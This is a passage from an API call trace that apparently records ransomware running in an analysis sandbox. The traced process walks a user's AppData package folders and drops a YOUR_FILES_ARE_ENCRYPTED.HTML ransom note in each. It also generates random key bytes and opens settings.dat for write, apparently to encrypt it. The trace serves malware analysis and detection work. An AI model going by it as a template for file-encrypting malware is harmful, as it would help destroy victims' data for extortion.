ftLastWriteTime.dwLowDateTime=0x9d41224c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0121.005] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.006] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\RoamingState") returned 106 [0121.006] GetProcessHeap () returned 0x600000 [0121.006] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.006] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\RoamingState" [0121.006] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\RoamingState\\*" [0121.006] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d41224c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d41224c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d41224c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626778 [0121.006] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d41224c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d41224c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d41224c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0121.006] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d41224c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d41224c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d41224c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0121.006] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0121.006] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 136 [0121.006] GetProcessHeap () returned 0x600000 [0121.006] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0121.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxidentityprovider_cw5n1h2txyewy\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0121.007] WriteFile (in: hFile=0x320, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.007] CloseHandle (hObject=0x320) returned 1 [0121.008] GetProcessHeap () returned 0x600000 [0121.008] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0121.008] GetProcessHeap () returned 0x600000 [0121.008] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.008] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d41224c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d4383e5, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d4383e5, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0121.008] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.008] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Settings") returned 102 [0121.008] GetProcessHeap () returned 0x600000 [0121.008] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.008] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Settings" [0121.008] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Settings\\*" [0121.008] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d41224c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d4383e5, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9404784f, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626838 [0121.009] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d41224c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d4383e5, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9404784f, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0121.009] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d4383e5, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d4383e5, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d4383e5, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0121.009] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.009] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Settings\\roaming.lock") returned 115 [0121.009] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0121.009] lstrlenW (lpString=".lock") returned 5 [0121.009] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0121.009] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d4383e5, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x941c4e32, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x941c4e32, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0121.009] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.009] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Settings\\settings.dat") returned 115 [0121.009] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0121.009] lstrlenW (lpString=".dat") returned 4 [0121.009] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0121.009] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0121.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxidentityprovider_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0121.010] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0121.010] GetProcessHeap () returned 0x600000 [0121.010] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0121.010] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="DE") returned 2 [0121.010] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="86") returned 2 [0121.011] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="9C") returned 2 [0121.011] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="28") returned 2 [0121.011] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="3B") returned 2 [0121.011] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="0A") returned 2 [0121.011] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="04") returned 2 [0121.011] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="8E") returned 2 [0121.011] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="1A") returned 2 [0121.011] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="2C") returned 2 [0121.011] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="8C") returned 2 [0121.011] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="1D") returned 2 [0121.011] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="A4") returned 2 [0121.011] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="65") returned 2 [0121.011] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="74") returned 2 [0121.011] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="16") returned 2 [0121.011] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="99") returned 2 [0121.011] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="F8") returned 2 [0121.011] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="A7") returned 2 [0121.011] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="73") returned 2 [0121.011] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="BB") returned 2 [0121.011] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="23") returned 2 [0121.011] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="65") returned 2 [0121.011] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="AB") returned 2 [0121.011] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="25") returned 2 [0121.011] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="B4") returned 2 [0121.011] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="FE") returned 2 [0121.011] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="6F") returned 2 [0121.011] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="40") returned 2 [0121.011] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="CC") returned 2 [0121.011] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="85") returned 2 [0121.011] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="58") returned 2 [0121.012] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Settings\\settings.dat" [0121.012] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0121.012] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0121.012] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x93faeefa, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x93faeefa, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x93faeefa, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0121.012] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.012] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Settings\\settings.dat.LOG1") returned 120 [0121.012] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0121.012] lstrlenW (lpString=".LOG1") returned 5 [0121.012] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0121.012] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x93faeefa, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x93faeefa, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x93faeefa, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0121.012] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.012] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Settings\\settings.dat.LOG2") returned 120 [0121.012] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0121.012] lstrlenW (lpString=".LOG2") returned 5 [0121.012] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0121.012] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x93faeefa, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x93faeefa, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x93faeefa, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0121.012] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0121.012] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 132 [0121.012] GetProcessHeap () returned 0x600000 [0121.012] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0121.012] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxidentityprovider_cw5n1h2txyewy\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0121.013] WriteFile (in: hFile=0x320, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.014] CloseHandle (hObject=0x320) returned 1 [0121.014] GetProcessHeap () returned 0x600000 [0121.014] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0121.014] GetProcessHeap () returned 0x600000 [0121.014] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.014] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d4383e5, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d4383e5, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d4383e5, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0121.014] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.014] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\SystemAppData") returned 107 [0121.014] GetProcessHeap () returned 0x600000 [0121.014] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.014] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\SystemAppData" [0121.014] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\SystemAppData\\*" [0121.014] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d4383e5, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d4383e5, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d4383e5, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.015] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d4383e5, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d4383e5, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d4383e5, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0121.015] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d4383e5, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d4383e5, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d4383e5, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0121.015] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.015] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 137 [0121.015] GetProcessHeap () returned 0x600000 [0121.015] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0121.015] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxidentityprovider_cw5n1h2txyewy\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0121.016] WriteFile (in: hFile=0x320, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.017] CloseHandle (hObject=0x320) returned 1 [0121.017] GetProcessHeap () returned 0x600000 [0121.017] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0121.017] GetProcessHeap () returned 0x600000 [0121.017] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.017] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d41224c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d41224c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d41224c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0121.017] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.017] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\TempState") returned 103 [0121.017] GetProcessHeap () returned 0x600000 [0121.017] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.017] lstrcpyW (in: lpString1=0x313b008, 